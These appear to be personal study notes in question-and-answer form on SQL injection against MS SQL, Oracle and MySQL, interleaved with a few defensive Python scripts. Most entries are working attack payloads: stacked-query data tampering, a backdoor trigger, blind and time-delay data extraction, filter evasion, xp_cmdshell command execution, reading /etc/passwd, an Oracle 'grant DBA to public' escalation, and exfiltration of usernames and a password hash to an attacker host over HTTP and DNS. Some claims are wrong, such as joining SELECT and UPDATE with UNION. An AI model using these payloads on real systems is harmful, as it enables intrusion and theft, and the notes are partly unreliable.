Cyber Security Notes


Q: - How to update/modify a record in the DB using SQLi?

For example, our salaries table has two columns, userid and salary, and the application builds its query around the userid value.

foo'; UPDATE salaries SET salary=9999999 WHERE userid='jsmith

Note: foo is the value and it could be anything.

*************************************************************************************

Q: - How to insert a record in the DB using SQLi?

For example, our salaries table has two columns.

bar'; INSERT INTO salaries VALUES ('cwillis', 999999); --

Note:

1- bar is the value and it could be anything else.

2- The -- sign comments out the rest of the original query, so only our own manufactured query runs after the injection point.

3- The semi-colon terminates the original statement so that our manufactured query can follow it.
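The defence against both the UPDATE and the INSERT payloads above is the same: the value must never be pasted into the SQL text. The following Python/sqlite3 script is an added example, not code from these notes; it shows the string-built query (run through a driver that accepts stacked statements) letting the payloads through, and the parameterised query treating the same input as a harmless userid. The salaries table and its seed rows are constructed.

```python
import sqlite3

# Constructed sample data for the two-column salaries table used above.
SEED_ROWS = [("jsmith", 50000), ("tclark", 62000)]


def make_db():
    """Fresh in-memory SQLite database holding the salaries table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE salaries (userid TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO salaries VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def salary_of(conn, userid):
    """Helper for inspecting the table state; None when the user is absent."""
    row = conn.execute("SELECT salary FROM salaries WHERE userid = ?", (userid,)).fetchone()
    return row[0] if row else None


def lookup_vulnerable(conn, userid):
    """The pattern behind the payloads above: the value is pasted into the SQL
    text. executescript() executes every statement it is handed, which stands
    in for a driver (SQL Server's, for instance) that accepts stacked queries,
    so a ';' in the input appends whatever statement follows it.
    (sqlite3's plain execute() would refuse the second statement outright.)"""
    sql = "SELECT salary FROM salaries WHERE userid = '" + userid + "'"
    conn.executescript(sql)


def lookup_safe(conn, userid):
    """Parameterised form: the value is bound, never parsed as SQL, so the
    quote and semicolon are just characters in a userid that does not exist."""
    cur = conn.execute("SELECT salary FROM salaries WHERE userid = ?", (userid,))
    return cur.fetchall()


if __name__ == "__main__":
    update_payload = "foo'; UPDATE salaries SET salary=9999999 WHERE userid='jsmith"
    insert_payload = "bar'; INSERT INTO salaries VALUES ('cwillis', 999999); --"

    db = make_db()
    lookup_vulnerable(db, update_payload)
    print("vulnerable, jsmith salary now:", salary_of(db, "jsmith"))  # 9999999

    db = make_db()
    lookup_vulnerable(db, insert_payload)
    print("vulnerable, cwillis row:", salary_of(db, "cwillis"))  # 999999

    db = make_db()
    print("safe lookup result:", lookup_safe(db, insert_payload))  # []
    print("safe, cwillis row:", salary_of(db, "cwillis"))  # None
```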

*************************************************************************************

Q: - How to combine two SQL statements in one SQLi attack?

select userid, password,ssn,salary,email from employee where userid=101 union update employee set salary=99999 where userid=101; --

Note: you can see that there are two SQL statements, one select and one update. They both run in the same request to execute the attack on the DB, joined with the union keyword.

*************************************************************************************
Q: - How to Create Database Back Door Attacks?

A Database backdoor often works with a trigger, but keep in mind that not every Database supports triggers. Now the question is how to create such a trigger. We can create a trigger, but first you have to know which column is most vulnerable. In this case email is our most vulnerable column, because on this basis, whenever a new user is created, the new user's email is replaced with the attacker's email. To create the Database trigger, you need to inject the following SQL:

101';CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid; END;--

*************************************************************************************
Q: - How to check the number of columns in a Database using SQL?

We can find the number of columns by adding NULL (or empty string) placeholders one at a time until the UNION no longer errors.

' UNION SELECT NULL--

' UNION SELECT NULL,NULL--

' UNION SELECT NULL,NULL,NULL--

*************************************************************************************
Q: - How to check whether a column's datatype is string or integer in SQL?

We can check the datatype by placing a string in each column position in turn.

' UNION SELECT 'a'--

' UNION SELECT NULL,'a'--

' UNION SELECT NULL,NULL,'a'--

*************************************************************************************
Q: - How to check the number of columns in Oracle?

In Oracle we can check the number of columns just as easily, but Oracle always requires a 'from' clause with a select statement. So, we use the DUAL table for this purpose. DUAL is a globally accessible table in Oracle.

' UNION SELECT 'a' from DUAL--

' UNION SELECT NULL,'a' from DUAL--

' UNION SELECT NULL,NULL,'a' from DUAL--


*************************************************************************************
Q: - How to get the Database version by using the version string in SQL?

' UNION SELECT @@VERSION,NULL,NULL--

*************************************************************************************
Q: - How to detect the DB version in Oracle using the version string?

' UNION SELECT banner,NULL,NULL FROM v$version--

*************************************************************************************
Q: - How to get the 4th table from the sys.tables list?

(select top 1 name from sys.tables where object_id=(select top 1 object_id from (select top 4 object_id from sys.tables order by object_id) sq order by object_id desc)) --

This query includes 2 sub-queries: the innermost returns the first 4 object_ids, and the sub-query around it reverses the order and takes the top 1, which is the table in 4th position. The outer query, in which the column "name" is mentioned, runs last to get only the table name. Here "sq" is just an alias, nothing else. The same technique is used for fetching columns; let's try it.

(select top 1 name from sys.columns where object_id=(select top 1 object_id from (select top 4 object_id from sys.columns order by object_id) sq order by object_id desc))--

*************************************************************************************
Q: - How to detect blind SQL injection?

We can detect blind SQL injection with the Boolean method, i.e. a yes/no question. For example, we can use this kind of query for injection:

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select count(*) from sys.tables)=8 then powerkw else torquenm end&asc=false

In this query the user is asking whether the count of sys.tables is equal to 8 or not, using a CASE WHEN ... ELSE expression; the answer is revealed by which column the page is sorted on.

We can also use the > sign or < sign because it is simply a yes/no injection.

*************************************************************************************

Q: - How to get the name of the first table using blind SQL injection?

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 name from sys.tables)='UserProfile' then powerkw else torquenm end&asc=false

*************************************************************************************
Q: - How to get to know the name of the first table by guessing only?

We can guess it letter by letter: substring extracts the first letter of the first table name in the Database, and we compare it against our guess.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 substring(name,1,1) from sys.tables)='U' then powerkw else torquenm end&asc=false

name is the column name, the first 1 is the starting position and the second 1 means take one character, so the expression checks only the first letter of the table name (here the guess is 'U', the first letter of UserProfile).

*************************************************************************************

Q: - What is the smart way to detect the first table of the Database?

A simpler and smarter way of guessing the table name is to compare ASCII codes (table below) instead of characters, which allows range comparisons.

Bin      Hex  Dec  Symbol  Explanation

-------------------------------------------------------------------------------------------------

0000000  0    0    NUL     The null character prompts the device to do nothing
0100000  20   32   SP      Blank space
0100001  21   33   !       Exclamation mark
0100010  22   34   "       Double quote
0100011  23   35   #       Pound sign
0100100  24   36   $       Dollar sign
0100101  25   37   %       Percent sign
0100110  26   38   &       Ampersand
0100111  27   39   '       Apostrophe
0101000  28   40   (       Left bracket
0101001  29   41   )       Right bracket
0101010  2A   42   *       Asterisk
0101011  2B   43   +       Plus symbol
0101100  2C   44   ,       Comma
0101101  2D   45   -       Dash
0101110  2E   46   .       Full stop
0101111  2F   47   /       Forward slash
0110000  30   48   0
0110001  31   49   1
0110010  32   50   2
0110011  33   51   3
0110100  34   52   4
0110101  35   53   5
0110110  36   54   6
0110111  37   55   7
0111000  38   56   8
0111001  39   57   9
0111010  3A   58   :       Colon
0111011  3B   59   ;       Semicolon
0111100  3C   60   <       Less-than sign
0111101  3D   61   =       Equals sign
0111110  3E   62   >       Greater-than sign
0111111  3F   63   ?       Question mark
1000000  40   64   @       At symbol
1000001  41   65   A
1000010  42   66   B
1000011  43   67   C
1000100  44   68   D
1000101  45   69   E
1000110  46   70   F
1000111  47   71   G
1001000  48   72   H
1001001  49   73   I
1001010  4A   74   J
1001011  4B   75   K
1001100  4C   76   L
1001101  4D   77   M
1001110  4E   78   N
1001111  4F   79   O
1010000  50   80   P
1010001  51   81   Q
1010010  52   82   R
1010011  53   83   S
1010100  54   84   T
1010101  55   85   U
1010110  56   86   V
1010111  57   87   W
1011000  58   88   X
1011001  59   89   Y
1011010  5A   90   Z
1011011  5B   91   [       Left square bracket
1011100  5C   92   \       Backslash
1011101  5D   93   ]       Right square bracket
1011110  5E   94   ^       Circumflex
1011111  5F   95   _       Underscore
1100000  60   96   `       Grave accent (backtick)
1100001  61   97   a
1100010  62   98   b
1100011  63   99   c
1100100  64   100  d
1100101  65   101  e
1100110  66   102  f
1100111  67   103  g
1101000  68   104  h
1101001  69   105  i
1101010  6A   106  j
1101011  6B   107  k
1101100  6C   108  l
1101101  6D   109  m
1101110  6E   110  n
1101111  6F   111  o
1110000  70   112  p
1110001  71   113  q
1110010  72   114  r
1110011  73   115  s
1110100  74   116  t
1110101  75   117  u
1110110  76   118  v
1110111  77   119  w
1111000  78   120  x
1111001  79   121  y
1111010  7A   122  z
1111011  7B   123  {       Left curly bracket
1111100  7C   124  |       Vertical line
1111101  7D   125  }       Right curly bracket
1111110  7E   126  ~       Tilde
1111111  7F   127  DEL     Deletes a character

*************************************************************************************

Q: - How to use ASCII characters to guess the table name?

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 ascii(lower(substring(name,1,1))) from sys.tables)=119 then powerkw else torquenm end&asc=false

Here ascii and lower are Database functions: ascii returns the ASCII code of a character and lower converts an upper-case letter to lower case. 119 is the character 'w', so we now have the first character of the table name. Let's guess the 2nd character.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 ascii(lower(substring(name,2,1))) from sys.tables)<=119 then powerkw else torquenm end&asc=false

So, we got 108='l'; now we have two characters in our list, 'wl'. (The <= comparison narrows the range of possible codes rather than testing one value.) Let's try the next guess.

https://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=case when (select top 1 ascii(lower(substring(name,3,1))) from sys.tables)<=98 then powerkw else torquenm end&asc=false

And we got another letter, 98='b'; now we have three letters in our bucket, 'wlb'.

*************************************************************************************

Q: - How to check Database rights?

To check whether the user can read data:

select is_rolemember('DB_datareader')

To check whether the user can write data:

select is_rolemember('DB_datawriter')

To check whether the user owns this DB:

select is_rolemember('DB_owner')
*************************************************************************************

Q: - How to execute a command shell in SQL Server via a SQL command?

First, we have to compromise the security of the SQL server and then reconfigure xp_cmdshell. This command is used to grant the user this right.

----------------------------------------------------------------------------------

exec sp_configure 'xp_cmdshell', 1

reconfigure

Now we can execute a cmd shell command:

---------------------------------

exec xp_cmdshell 'ping troyhunt.com'

Sometimes this command cannot be run directly from the web browser, because the ping command returns 12 rows or fewer that the page cannot display. So, we write the output to a txt file.

----------------------------------------------------------------------------------

exec xp_cmdshell 'ping troyhunt.com > c:\temp\ping.txt'

Then we can read that file later in the same context:

--------------------------------------------------------

exec xp_cmdshell 'type c:\temp\ping.txt'

*************************************************************************************

Q: - How to circumvent simple validation?

Some input validation routines employ a simple blacklist and either block or remove any supplied data that appears on this list. In this instance, you should try the standard attacks. For example, if the website owner has blacklisted the word "SELECT", we can counter this issue like this:

SeLeCt

%00SELECT

SELSELECTECT

%53%45%4c%45%43%54

%2553%2545%254c%2545%2543%2554

Which method you choose is up to you.

*************************************************************************************

Q: - What to do if app blocks or strips spaces from your input?

If the application blocks or strips spaces from your input, you can use comments (/*you can write
anything here*/) to simulate whitespace within your injected data. For example:

SELECT/*foo*/username,password/*foo*/FROM/*foo*/users

*************************************************************************************

Q: - Write down the syntax to use if both spaces and keywords are filtered at the same time.

In MySQL, comments can even be inserted within keywords themselves, which provides another means of bypassing some input validation filters while preserving the syntax of the actual query. For example:

SEL/*foo*/ECT username,password FR/*foo*/OM users
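To detect the inference payloads from the blind-injection examples above and the filter-evasion tricks in the last two answers, a detector has to canonicalise the input first (decode URL-encoding more than once, drop NUL bytes and inline comments, lower-case) and only then match signatures. The following Python script is an added example, not part of these notes; the log format and the sample requests are constructed from the payloads on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines: "<client> <method> <url>". The query strings
# are the payloads quoted in these notes, URL-encoded the way a browser sends them.
SAMPLE_LOG = [
    "10.0.0.5 GET /Supercar/Leaderboard?orderBy=powerkw&asc=false",
    "10.0.0.9 GET /Supercar/Leaderboard?orderBy=case%20when%20(select%20count(*)%20from%20sys.tables)=8%20then%20powerkw%20else%20torquenm%20end&asc=false",
    "10.0.0.9 GET /Supercar/Leaderboard?orderBy=case%20when%20(select%20top%201%20ascii(lower(substring(name,1,1)))%20from%20sys.tables)=119%20then%20powerkw%20else%20torquenm%20end&asc=false",
    "10.0.0.9 GET /search?q=%27%20UNION%20SELECT%20NULL,NULL--",
    "10.0.0.9 GET /search?q=%2553%2545%254c%2545%2543%2554/*foo*/username,password/*foo*/FR/*foo*/OM/*foo*/users",
    "10.0.0.9 GET /search?q=%2527;%20exec%20xp_cmdshell%20%27ping%20troyhunt.com%27",
    "10.0.0.9 GET /search?q=foo%27%20if%20(select%20user)=%27sa%27%20waitfor%20delay%20%270:0:5%27",
    "10.0.0.9 GET /search?q=%00SeLeCt%20@@version",
]

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Matched against the canonical form, so '\s*' (not '\s+') is used: once
# inline comments are removed, "UNION/*x*/SELECT" has no whitespace at all.
SIGNATURES = {
    "union-column-probe": re.compile(r"union\s*select\s*(null|'a'|\d)"),
    "boolean-inference": re.compile(r"case\s*when\s*\(?\s*select\b.*?\bthen\b.*?\belse\b"),
    "char-by-char": re.compile(r"ascii\s*\(.*?substr"),
    "stacked-statement": re.compile(r";\s*(update|insert|delete|drop|create\s*trigger|exec)\b"),
    "time-delay": re.compile(r"waitfor\s*delay|\bsleep\s*\(|benchmark\s*\(|pg_sleep"),
    "dangerous-procedure": re.compile(r"xp_cmdshell|xp_reg|openrowset|utl_http|utl_inaddr|is_rolemember"),
    "version-probe": re.compile(r"@@version|v\$version"),
}


def normalize(value, max_rounds=3):
    """Canonicalise one parameter value; also report which evasions it used."""
    flags = set()
    text = value
    for rounds in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        if rounds >= 1:                  # %2553 -> %53 -> S: needed a 2nd pass
            flags.add("double-encoded")
        text = decoded
    if "\x00" in text:                   # %00SELECT
        flags.add("null-byte")
        text = text.replace("\x00", "")
    stripped = COMMENT_RE.sub("", text)  # SEL/*foo*/ECT, FROM/*foo*/users
    if stripped != text:
        flags.add("inline-comment")
    text = re.sub(r"\s+", " ", stripped).strip().lower()  # SeLeCt
    return text, flags


def classify(value):
    """Sorted list of evasion flags and signature names for one raw value."""
    text, flags = normalize(value)
    hits = {name for name, rx in SIGNATURES.items() if rx.search(text)}
    return sorted(flags | hits)


def scan_log(lines):
    """(client, path, findings) for each request; findings is [] when clean."""
    report = []
    for line in lines:
        client, _method, url = line.split(" ", 2)
        path, _, query = url.partition("?")
        findings = set()
        for pair in query.split("&"):
            _name, _, value = pair.partition("=")
            findings.update(classify(value))
        report.append((client, path, sorted(findings)))
    return report


if __name__ == "__main__":
    for client, path, findings in scan_log(SAMPLE_LOG):
        print(client, path, findings or "clean")
```

The detector flags rather than strips, because removal-based filters are exactly what the SELSELECTECT trick defeats.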

*************************************************************************************

Q: - What is the role of openrowset in an MS SQL 2000 Database attack?

On older Databases such as MS-SQL 2000 and earlier, the OpenRowSet command can be used to open a connection to an external Database and insert arbitrary data into it. For example, the following query causes the target Database to open a connection to the attacker's Database and insert the version string of the target Database into the table called foo.

insert into openrowset('SQLOLEDB', 'DRIVER={SQL Server};SERVER=mdattacker.net,80;UID=sa;PWD=letmein', 'select * from foo') values (@@version)

*************************************************************************************

Q: - What is the role of UTL_HTTP in an ORACLE Database attack?

The UTL_HTTP package can be used to make arbitrary HTTP requests to other hosts. UTL_HTTP contains rich functionality and supports proxy servers, cookies, redirects, and authentication. This means that an attacker who has compromised a Database on a highly restricted internal corporate network may be able to leverage a corporate proxy to initiate outbound connections to the Internet.

In the following example, UTL_HTTP is used to transmit the results of an injected query to a server controlled by the attacker:

/employees.asp?EmpNo=7521'||UTL_HTTP.request('mdattacker.net:80/'||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--

This URL causes UTL_HTTP to make a GET request for a URL containing the first username in the table all_users. The attacker can simply set up a netcat listener on mdattacker.net to receive the result:

C:\>nc -nLp 80

GET /SYS HTTP/1.1

Host: mdattacker.net

Connection: close
*************************************************************************************

Q: - What is the alternative approach if UTL_HTTP does not work in corporate networks due to the firewall implementation?

The UTL_INADDR package is designed to resolve hostnames to IP addresses. It can be used to generate arbitrary DNS queries to a server controlled by the attacker. In many situations, this is more likely to succeed than the UTL_HTTP attack, because DNS traffic is often allowed out through corporate firewalls even when HTTP traffic is restricted. The attacker can leverage this package to perform a lookup on a hostname of his choice, effectively retrieving arbitrary data by prepending it as a subdomain to a domain name he controls.

For example:

/employees.asp?EmpNo=7521'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20NAME='SYS')||'.mdattacker.net')

This results in a DNS query to the mdattacker.net name server containing the SYS user's password hash: DCB748A5BC5390F2.mdattacker.net
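On the defender's side, the subdomain lookup above is visible in resolver logs as a query whose leftmost label is a hex blob rather than a hostname. This Python script is an added example, not from these notes; the log format, the thresholds and all lines other than the hash quoted on this page are constructed.

```python
import math
import re
from collections import Counter

# Constructed resolver log lines: "<timestamp> <client> <qtype> <qname>".
# The hex label in the third line is the SYS password hash shown above.
SAMPLE_DNS_LOG = [
    "2024-05-01T09:00:01 10.0.0.7 A www.example.com",
    "2024-05-01T09:00:02 10.0.0.7 A cdn.example.net",
    "2024-05-01T09:00:03 10.0.0.7 A DCB748A5BC5390F2.mdattacker.net",
    "2024-05-01T09:00:04 10.0.0.8 A mail.example.com",
]

# Assumed thresholds: a 12+ character pure-hex label, or a 16+ character
# label with high entropy, is unlike any label a human would type.
HEX_LABEL = re.compile(r"^[0-9a-f]{12,}$")
MIN_ENTROPY_LEN = 16
MIN_ENTROPY_BITS = 3.0


def shannon_entropy(label):
    """Bits per character; random-looking labels score well above plain words."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_findings(qname):
    """Reasons, if any, that the leftmost label looks like smuggled data."""
    label = qname.rstrip(".").split(".")[0].lower()
    findings = []
    if HEX_LABEL.match(label):
        findings.append("hex-blob")
    if len(label) >= MIN_ENTROPY_LEN and shannon_entropy(label) >= MIN_ENTROPY_BITS:
        findings.append("high-entropy")
    return findings


def scan_dns_log(lines):
    """(client, qname, findings) for every query that trips at least one rule."""
    alerts = []
    for line in lines:
        _ts, client, _qtype, qname = line.split()
        findings = label_findings(qname)
        if findings:
            alerts.append((client, qname, findings))
    return alerts


if __name__ == "__main__":
    for client, qname, findings in scan_dns_log(SAMPLE_DNS_LOG):
        print(client, qname, findings)
```

In a real deployment the same rule would be applied per client over a time window, since one-character-at-a-time extraction shows up as many short lookups to the same domain.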

*************************************************************************************

Q: - What is the use of UTL_SMTP & UTL_TCP?

The UTL_SMTP package can be used to send e-mails. This facility can be used to retrieve large volumes of data captured from the Database by sending it in outbound e-mails.

The UTL_TCP package can be used to open arbitrary TCP sockets to send and receive network data.

*************************************************************************************

Q: - What is the time delay technique?

In this technique a Database query causes a time delay, contingent on some condition specified by the attacker. The attacker can submit his query and then monitor the time taken for the server to respond. If a delay occurs, the attacker may infer that the condition is true. Even if the actual content of the application's response is identical in the two cases, the presence or absence of a time delay enables the attacker to extract a single bit of information from the Database. By performing numerous such queries, the attacker can systematically retrieve arbitrarily complex data from the Database one bit at a time.

*************************************************************************************

Q: - How to implement the time delay technique in MS SQL?

MS-SQL contains a built-in WAITFOR command, which can be used to cause a specified time delay. For example, the following query causes a time delay of 5 seconds if the current Database user is sa:

if (select user) = 'sa' waitfor delay '0:0:5'

*************************************************************************************

Q: - How can we use the ASCII and SUBSTRING functions to get data from the Database using the time delay technique?

if ASCII(SUBSTRING('Admin',1,1)) = 64 waitfor delay '0:0:5'

if ASCII(SUBSTRING('Admin',1,1)) = 65 waitfor delay '0:0:5'

We compare the first character of the string 'Admin' against one ASCII code at a time; 65 is 'A', so only the second query causes the delay.

*************************************************************************************

Q: - How to use the sleep function in different Databases?

MS SQL Server: -

if (ASCII(SUBSTRING('Admin',1,1)) & (POWER(2,0))) > 0 waitfor delay '0:0:5'

MySQL (version<5.0.12): -

select if(user() like 'root@%', sleep(5000), 'false')

MySQL (version>5.0.12): -

select if(user() like 'root@%', benchmark(50000,sha1('test')), 'false')

benchmark repeatedly performs a hash function, normally SHA1, and the repetition produces the delay.

PostgreSQL: -

The PG_SLEEP function can be used in the same way as the MySQL sleep function.

Oracle: -

Oracle has no built-in method to perform a time delay, but you can use other tricks to cause one. One trick is to use UTL_HTTP to connect to a nonexistent server, causing a timeout. This causes the Database to attempt to connect to the specified server and eventually time out. For example:

SELECT 'a'||Utl_Http.request('http://madeupserver.com') from dual

...delay...

ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1556

ORA-12545: Connect failed because target host or object does not exist.

You can leverage this behavior to cause a time delay contingent on some condition that you specify. For example, the following query causes a timeout if the default Oracle account DBSNMP exists:

SELECT 'a'||Utl_Http.request('http://madeupserver.com') FROM dual WHERE (SELECT username FROM all_users WHERE username = 'DBSNMP') = 'DBSNMP'

*************************************************************************************

Q: - What are different default Databases in Database systems?

Oracle: -

dual, v$version, all_tables, all_tab_columns

MySQL, PostgreSQL: -

information_schema.tables,information_schema.columns

SQLite: -

sqlite_master

MS SQL Server: -

Master, Model, TempDB, Pubs, Northwind, MsDB

*************************************************************************************

Q: - What if you cannot alter the WHERE clause or issue a UNION query after an ORDER BY clause?

It is not possible to alter the WHERE clause, or issue a UNION query, after an ORDER BY clause; however, an attacker can create an inference condition by issuing the following statement:

/search.jsp?department=20&sort=(select%201/0%20from%20dual%20where%20(select%20substr(max(object_name),1,1)%20FROM%20user_objects)='Y')

If the first letter of the first object name in the user_objects table is equal to 'Y', this will cause the Database to attempt to evaluate 1/0. This will result in an error, and no results will be returned by the overall query. If the letter is not equal to 'Y', results from the original query will be returned in the default order.
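Query parameters cannot bind column names, which is why the sort parameter here and the orderBy parameter in the leaderboard examples above are injectable. The allow-list below is an added example (not the notes' or the training site's code): the Supercar table, its columns and rows are constructed, and only a known sort key ever reaches the ORDER BY clause.

```python
import sqlite3

# Constructed leaderboard rows (name, power in kW, torque in Nm).
SAMPLE_CARS = [("Veyron", 736, 1250), ("Huayra", 538, 1000), ("Aventador", 515, 690)]

# Sort keys a client may send, mapped to the real column identifiers.
# Column names cannot be bound as query parameters, so an allow-list is
# what keeps the ORDER BY clause under the application's control.
SORTABLE_COLUMNS = {"powerkw": "PowerKw", "torquenm": "TorqueNm", "name": "Name"}


def make_db():
    """In-memory SQLite database with the constructed Supercar table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Supercar (Name TEXT, PowerKw INTEGER, TorqueNm INTEGER)")
    conn.executemany("INSERT INTO Supercar VALUES (?, ?, ?)", SAMPLE_CARS)
    conn.commit()
    return conn


def is_accepted(order_by):
    """True only for a known sort key; 'case when ...' and '(select 1/0 ...)'
    payloads are rejected before any SQL text is built."""
    return order_by.strip().lower() in SORTABLE_COLUMNS


def build_leaderboard_query(order_by, asc):
    """Assemble the statement from fixed tokens chosen by the allow-list."""
    if not is_accepted(order_by):
        raise ValueError("unsupported sort column: %r" % order_by[:40])
    column = SORTABLE_COLUMNS[order_by.strip().lower()]
    # The asc flag is likewise reduced to one of two fixed tokens.
    direction = "ASC" if str(asc).lower() == "true" else "DESC"
    return "SELECT Name, PowerKw, TorqueNm FROM Supercar ORDER BY %s %s" % (column, direction)


def leaderboard(conn, order_by, asc):
    """Rows of the leaderboard in the requested, validated order."""
    return conn.execute(build_leaderboard_query(order_by, asc)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(leaderboard(db, "powerkw", "false"))
    payload = "case when (select count(*) from sys.tables)=8 then powerkw else torquenm end"
    print("payload accepted:", is_accepted(payload))  # False
```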

*************************************************************************************

Q: - How many ways are there to exploit the Database without SQL injection?

> If the Database is shared with other applications, you may be able to escalate privileges within the
Database and gain access to other applications' data.

> You may be able to compromise the operating system of the Database server.

> You may be able to gain network access to other systems. Typically, the Database server is hosted on a
protected network behind several layers of network perimeter defenses. From the Database server, you
may be in a trusted position and be able to reach key services on other hosts, which may be further
exploitable.

> You may be able to make network connections back out of the hosting infrastructure to your own
computer. This may enable you to bypass the application, easily transmitting large amounts of sensitive
data gathered from the Database, and often evading many intrusion detection systems.

> You may be able to extend the Database's existing functionality in arbitrary ways by creating user-defined functions. In some situations, this may enable you to circumvent hardening that has been performed on the Database by effectively reimplementing functionality that has been removed or disabled. There is a method for doing this in each of the mainstream Databases, provided that you have gained Database administrator (DBA) privileges.
*************************************************************************************

Q: - How can we use MS SQL to gain access to the victim computer?

There are two main commands which can be used to access the victim system via MS SQL.

1- xp_regread

2- xp_regwrite

MS-SQL contains a wealth of other extended stored procedures, such as xp_regread and xp_regwrite, that can be used to perform powerful actions within the registry of the Windows operating system.

*************************************************************************************

Q: - How to configure cmd_shell in MS SQL?

EXECUTE sp_configure 'show advanced options', 1

RECONFIGURE WITH OVERRIDE

EXECUTE sp_configure 'xp_cmdshell', '1'

RECONFIGURE WITH OVERRIDE

After configuration we can run xp_cmdshell with this command:

exec xp_cmdshell 'dir'

*************************************************************************************

Q: - Mention some Oracle DB flaws.

Oracle contains many built-in stored procedures that execute with DBA privileges and have been found to contain SQL injection flaws within the procedures themselves. A typical example of such a flaw existed in the default package SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES prior to the July 2006 critical patch update. This can be exploited to escalate privileges by injecting the query grant DBA to public into the vulnerable field:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('INDX','SCH','TEXTINDEXMETHODS".ODCIIndexUtilCleanup(:p1); execute immediate ''declare pragma autonomous_transaction; begin execute immediate ''''grant DBA to public'''' ; end;''; END;--','CTXSYS',1,'1',0) from dual

This type of attack could be delivered via a SQL injection flaw in a web application by injecting the function into the vulnerable parameter.

*************************************************************************************

Q: - How can we use MySQL to gain access to the victim computer?

Although MySQL contains relatively few built-in functions, we can use some of them to access the victim's PC.

FILE_PRIV: this built-in privilege gives a user the ability to read and write to the file system.

LOAD_FILE: this function can be used to retrieve the contents of any file. For example:

select load_file('/etc/passwd')

OUTFILE: the SELECT ... INTO OUTFILE command can be used to pipe the results of any query into a file. For example:

create table test (a varchar(200));
insert into test(a) values ('+ +');
select * from test into outfile '/etc/hosts.equiv'

*************************************************************************************

Q: - Write ASCII and SUBSTRING syntax for Oracle, MSSQL and MySQL?

Oracle: ASCII('A') is equal to 65 SUBSTR('ABCDE',2,3) is equal to BCD.

MSSQL: ASCII('A') is equal to 65 SUBSTRING('ABCDE',2,3) is equal to BCD.

MySQL: ASCII('A') is equal to 65 SUBSTRING('ABCDE',2,3) is equal to BCD.

*************************************************************************************
Q: - Write the syntax to retrieve the current Database user for Oracle, MSSQL and MySQL.

Oracle: SELECT Sys.login_user FROM dual
or: SELECT user FROM dual
or: SYS_CONTEXT('USERENV', 'SESSION_USER')

MSSQL: Select suser_sname()

MySQL: SELECT user()

*************************************************************************************

Q: - Write the syntax to cause a time delay for Oracle, MSSQL and MySQL.

Oracle: Utl_Http.request('http://madeupserver.com')

MSSQL: waitfor delay '0:0:10'
or: exec master..xp_cmdshell 'ping localhost'

MySQL: sleep(100)

*************************************************************************************

Q: - Write Retrieve Database version string syntax for Oracle, MSSQL and MySQL?

Oracle: select banner from v$version

MSSQL: select @@version

MySQL: select @@version

*************************************************************************************

Q: - Write Retrieve current Database syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual

MSSQL: SELECT DB_name(). The server name can be retrieved using: SELECT @@servername

MySQL: SELECT Database()

*************************************************************************************
Q: - Write Retrieve current user's privilege syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT privilege FROM session_privs

MSSQL: SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL: SELECT * FROM information_schema.user_privileges WHERE grantee = '[user]' where [user] is


determined from the output of SELECT user()

*************************************************************************************

Q: - Write the syntax to show all tables and columns in a single column of results for Oracle, MSSQL and MySQL.

Oracle: SELECT table_name||' '||column_name FROM all_tab_columns

MSSQL: SELECT table_name+' '+column_name FROM information_schema.columns

MySQL: SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns

*************************************************************************************

Q: - Write the syntax to show user objects for Oracle, MSSQL and MySQL.

Oracle: SELECT object_name, object_type FROM user_objects

MSSQL: SELECT name FROM sysobjects

MySQL: SELECT table_name FROM information_schema.tables (or trigger_name FROM information_schema.triggers, etc.)

*************************************************************************************

Q: - Write the syntax to show user tables for Oracle, MSSQL and MySQL.

Oracle: SELECT object_name, object_type FROM user_objects WHERE object_type='TABLE'

Or to show all tables to which the user has access: SELECT table_name FROM all_tables

MSSQL: SELECT name FROM sysobjects WHERE xtype='U'

MySQL: SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema!='mysql'

*************************************************************************************

Q: - Write Show column names for table foo syntax for Oracle, MSSQL and MySQL?

Oracle: SELECT column_name, name FROM user_tab_columns WHERE table_name = 'FOO'

Use the ALL_tab_columns table if the target data is not owned by the current application user.

MSSQL: SELECT column_name FROM information_schema.columns WHERE table_name='foo'

MySQL: SELECT column_name FROM information_schema.columns WHERE table_name='foo'

*************************************************************************************

Q: - Write the simplest syntax to interact with the operating system for Oracle, MSSQL and MySQL.

MSSQL: EXEC xp_cmdshell 'dir c:\'

MySQL: SELECT load_file('/etc/passwd')

*************************************************************************************

Q: - Write some "Error Messages" for Oracle, MSSQL and MySQL?

Oracle: ORA-01756: quoted string not properly terminated

ORA-00933: SQL command not properly ended

MS-SQL: Msg 170, Level 15, State 1, Line 1 Line 1:

Incorrect syntax near 'foo'

Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character string 'foo'

